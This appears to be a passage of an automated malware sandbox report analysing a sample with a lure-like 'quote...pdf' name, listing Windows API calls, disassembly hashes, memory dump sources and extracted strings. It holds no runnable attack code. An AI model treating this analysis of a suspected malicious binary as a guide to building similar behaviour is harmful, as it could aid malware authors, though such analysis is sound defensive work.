                                                                    • Associated: 00000000.00000002.1736531483.0000000000F1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736561931.0000000000F27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e60000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID: LengthMessageSendTextWindow
                                                                    • String ID: edit
                                                                    • API String ID: 2978978980-2167791130
                                                                    • Opcode ID: e816d9e03b19fd79d1c448ed6eac8fd5736523c1d8552906d24c6f55ecb91847
                                                                    • Instruction ID: 36b0488913e4dc02710301c12ca6b242309a63b2ab7778565653cb6628c6db7a
                                                                    • Opcode Fuzzy Hash: e816d9e03b19fd79d1c448ed6eac8fd5736523c1d8552906d24c6f55ecb91847
                                                                    • Instruction Fuzzy Hash: 0B116D7150028CABEB104F659C90AFB37A9EBA53A8F506724F9A4A71D1C732DC919760
                                                                    APIs
                                                                    • _memset.LIBCMT ref: 00EC2D1A
                                                                    • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 00EC2D39
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1736202388.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                    • Associated: 00000000.00000002.1735874657.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000EEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736531483.0000000000F1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736561931.0000000000F27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e60000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID: InfoItemMenu_memset
                                                                    • String ID: 0
                                                                    • API String ID: 2223754486-4108050209
                                                                    • Opcode ID: 24597cc8b42d255091b4202ac700db9b160644ecdb1821b551ae41a2c56f9a6b
                                                                    • Instruction ID: 3e30c23eb6200bce8b26374163c6899ac3035ea1d5c9e656ab8acf55ce92d20c
                                                                    • Opcode Fuzzy Hash: 24597cc8b42d255091b4202ac700db9b160644ecdb1821b551ae41a2c56f9a6b
                                                                    • Instruction Fuzzy Hash: 2A11E931D01218ABCB20DB58D984FEDBBA99B25704F14112DFE16BB260D772AD07D792
                                                                    APIs
                                                                    • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00ED2342
                                                                    • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00ED236B
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1736202388.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                    • Associated: 00000000.00000002.1735874657.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000EEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736531483.0000000000F1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736561931.0000000000F27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e60000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID: Internet$OpenOption
                                                                    • String ID: <local>
                                                                    • API String ID: 942729171-4266983199
                                                                    • Opcode ID: 435b18e5791113270afe631d83b894efacaf715568e6d943ddab79c2a81b5b32
                                                                    • Instruction ID: e5a67c381093219ef349899906faa8c63bf909fa1145d1719b306ec45b61a10a
                                                                    • Opcode Fuzzy Hash: 435b18e5791113270afe631d83b894efacaf715568e6d943ddab79c2a81b5b32
                                                                    • Instruction Fuzzy Hash: AF11E070501266BEDB288F128C84EFBFB68EF25359F10912FFA4566200D2746982D6F0
                                                                    APIs
                                                                      • Part of subcall function 00E67F41: _memmove.LIBCMT ref: 00E67F82
                                                                      • Part of subcall function 00EBAEA4: GetClassNameW.USER32(?,?,000000FF), ref: 00EBAEC7
                                                                    • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00EB9135
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1736202388.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                    • Associated: 00000000.00000002.1735874657.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000EEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736531483.0000000000F1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736561931.0000000000F27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e60000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID: ClassMessageNameSend_memmove
                                                                    • String ID: ComboBox$ListBox
                                                                    • API String ID: 372448540-1403004172
                                                                    • Opcode ID: 91c63c42796d3fb216944648bec1ab43725aee75dd12f3fd89df2e6c70f803fe
                                                                    • Instruction ID: 45a4474f79d22315c768e016c487c30a0e0c9bdeda3d96b6d79e442bf23ec280
                                                                    • Opcode Fuzzy Hash: 91c63c42796d3fb216944648bec1ab43725aee75dd12f3fd89df2e6c70f803fe
                                                                    • Instruction Fuzzy Hash: 93014531645215ABCB04FBA8CC95CFF33A8EF06320B141619F872772D2DA3158489660
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1736202388.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                    • Associated: 00000000.00000002.1735874657.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000EEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736531483.0000000000F1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736561931.0000000000F27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e60000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID: __fread_nolock_memmove
                                                                    • String ID: EA06
                                                                    • API String ID: 1988441806-3962188686
                                                                    • Opcode ID: f7f9862d1ec65b07ff57f02ee896a065bf8fe3b432a627a378f3883a127f5bff
                                                                    • Instruction ID: 2ef3d966d24ff4c86aa7af071a3fa8b47bf2f513390174f700db9ec4b478cdee
                                                                    • Opcode Fuzzy Hash: f7f9862d1ec65b07ff57f02ee896a065bf8fe3b432a627a378f3883a127f5bff
                                                                    • Instruction Fuzzy Hash: C901F972D042186EDB28D6A8CD16EEE7BF89B01301F00459FF556E2181E9B5E6088760
                                                                    APIs
                                                                      • Part of subcall function 00E67F41: _memmove.LIBCMT ref: 00E67F82
                                                                      • Part of subcall function 00EBAEA4: GetClassNameW.USER32(?,?,000000FF), ref: 00EBAEC7
                                                                    • SendMessageW.USER32(?,00000180,00000000,?), ref: 00EB902D
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1736202388.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                    • Associated: 00000000.00000002.1735874657.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000EEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736531483.0000000000F1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736561931.0000000000F27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e60000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID: ClassMessageNameSend_memmove
                                                                    • String ID: ComboBox$ListBox
                                                                    • API String ID: 372448540-1403004172
                                                                    • Opcode ID: 65e5afeb973205198482cf465c846b0aa918dd7d11f6a4b098c50612c4557bc7
                                                                    • Instruction ID: 456ef512bf12a75c7e1ca3b80b2eeac3f9c33d84a31aaef7f9e99a4c0c63a8f7
                                                                    • Opcode Fuzzy Hash: 65e5afeb973205198482cf465c846b0aa918dd7d11f6a4b098c50612c4557bc7
                                                                    • Instruction Fuzzy Hash: FF01FC717452086BCF14FBA4CD92DFF73E8DF05340F141015B94677282DE259E0892B1
                                                                    APIs
                                                                      • Part of subcall function 00E67F41: _memmove.LIBCMT ref: 00E67F82
                                                                      • Part of subcall function 00EBAEA4: GetClassNameW.USER32(?,?,000000FF), ref: 00EBAEC7
                                                                    • SendMessageW.USER32(?,00000182,?,00000000), ref: 00EB90B0
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1736202388.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                    • Associated: 00000000.00000002.1735874657.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000EEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736531483.0000000000F1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736561931.0000000000F27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e60000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID: ClassMessageNameSend_memmove
                                                                    • String ID: ComboBox$ListBox
                                                                    • API String ID: 372448540-1403004172
                                                                    • Opcode ID: 3e2e1db05c334c523c609b85c8596509db2ebfd392f922fa4e11b5216cccf197
                                                                    • Instruction ID: 8844eda802ec17262791fb8759288a0774054231faa66467a3bede045bf2def7
                                                                    • Opcode Fuzzy Hash: 3e2e1db05c334c523c609b85c8596509db2ebfd392f922fa4e11b5216cccf197
                                                                    • Instruction Fuzzy Hash: A501A7717852046BCF14FBA4C992DFF73E89F05350F242015794677283DA259E4892B2
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1736202388.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                    • Associated: 00000000.00000002.1735874657.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000EEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736531483.0000000000F1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736561931.0000000000F27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e60000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID: ClassName_wcscmp
                                                                    • String ID: #32770
                                                                    • API String ID: 2292705959-463685578
                                                                    • Opcode ID: d9dc17198134425e033f78442862f916d99a775f8ebc503458f919625770058a
                                                                    • Instruction ID: cb8b3a25b3b3ac1ee72baaea0d49284403d8b352878ffbc4d9bd9285e8b8373a
                                                                    • Opcode Fuzzy Hash: d9dc17198134425e033f78442862f916d99a775f8ebc503458f919625770058a
                                                                    • Instruction Fuzzy Hash: 36E09B3250022D2AD72096599C46F97F7ACEB45770F001157FD04E7151D5709A4697D1
                                                                    APIs
                                                                      • Part of subcall function 00E9B494: _memset.LIBCMT ref: 00E9B4A1
                                                                      • Part of subcall function 00E80AC0: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,00E9B470,?,?,?,00E6100A), ref: 00E80AC5
                                                                    • IsDebuggerPresent.KERNEL32(?,?,?,00E6100A), ref: 00E9B474
                                                                    • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,00E6100A), ref: 00E9B483
                                                                    Strings
                                                                    • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00E9B47E
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1736202388.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                    • Associated: 00000000.00000002.1735874657.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000EEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736531483.0000000000F1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736561931.0000000000F27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e60000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
                                                                    • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                                    • API String ID: 3158253471-631824599
                                                                    • Opcode ID: f144447536930b57b6cb66d7bfb4bc18b23e55890b6e2fe0cde6b1d0ef42ccd7
                                                                    • Instruction ID: 871e4fcecb000a4f7ae1c0123c441d0313069ab94569bbce32e1e4283ec8607d
                                                                    • Opcode Fuzzy Hash: f144447536930b57b6cb66d7bfb4bc18b23e55890b6e2fe0cde6b1d0ef42ccd7
                                                                    • Instruction Fuzzy Hash: F4E092702007508FDBB0DF25E5087427BE0AF04B04F01996CE496E7392EBB4D448EBA1
                                                                    APIs
                                                                    • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00EE59D7
                                                                    • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00EE59EA
                                                                      • Part of subcall function 00EC52EB: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00EC5363
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1736202388.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                    • Associated: 00000000.00000002.1735874657.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000EEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736531483.0000000000F1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736561931.0000000000F27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e60000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID: FindMessagePostSleepWindow
                                                                    • String ID: Shell_TrayWnd
                                                                    • API String ID: 529655941-2988720461
                                                                    • Opcode ID: 5abf631fde71c659f6c33dda2b9557204f8fd7302843606f248a6edf698880ad
                                                                    • Instruction ID: 85d8362bb16fd6697aee0c9d9430b99152433dafa87b0b519d2e020358cd3f0b
                                                                    • Opcode Fuzzy Hash: 5abf631fde71c659f6c33dda2b9557204f8fd7302843606f248a6edf698880ad
                                                                    • Instruction Fuzzy Hash: 4DD0A932380301BBE668AB709C8BFD22A60AB40B50F000828B205BA0E0C8E0A8458650
                                                                    APIs
                                                                    • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00EE5A17
                                                                    • PostMessageW.USER32(00000000), ref: 00EE5A1E
                                                                      • Part of subcall function 00EC52EB: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00EC5363
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1736202388.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                    • Associated: 00000000.00000002.1735874657.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000EEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736531483.0000000000F1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736561931.0000000000F27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e60000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID: FindMessagePostSleepWindow
                                                                    • String ID: Shell_TrayWnd
                                                                    • API String ID: 529655941-2988720461
                                                                    • Opcode ID: 13541b98c5ee3d64acfd663c1bc0d164645be90d3237ca48492c6834c1cebefb
                                                                    • Instruction ID: 02f43465cc1169d5796104ecbc7c409a59969653e7b0ac01af7f761f4ba7da88
                                                                    • Opcode Fuzzy Hash: 13541b98c5ee3d64acfd663c1bc0d164645be90d3237ca48492c6834c1cebefb
                                                                    • Instruction Fuzzy Hash: 18D0A9323803017BE668AB709C8BFC22A60AB40B50F000828B201BA0E0C8E0A8458654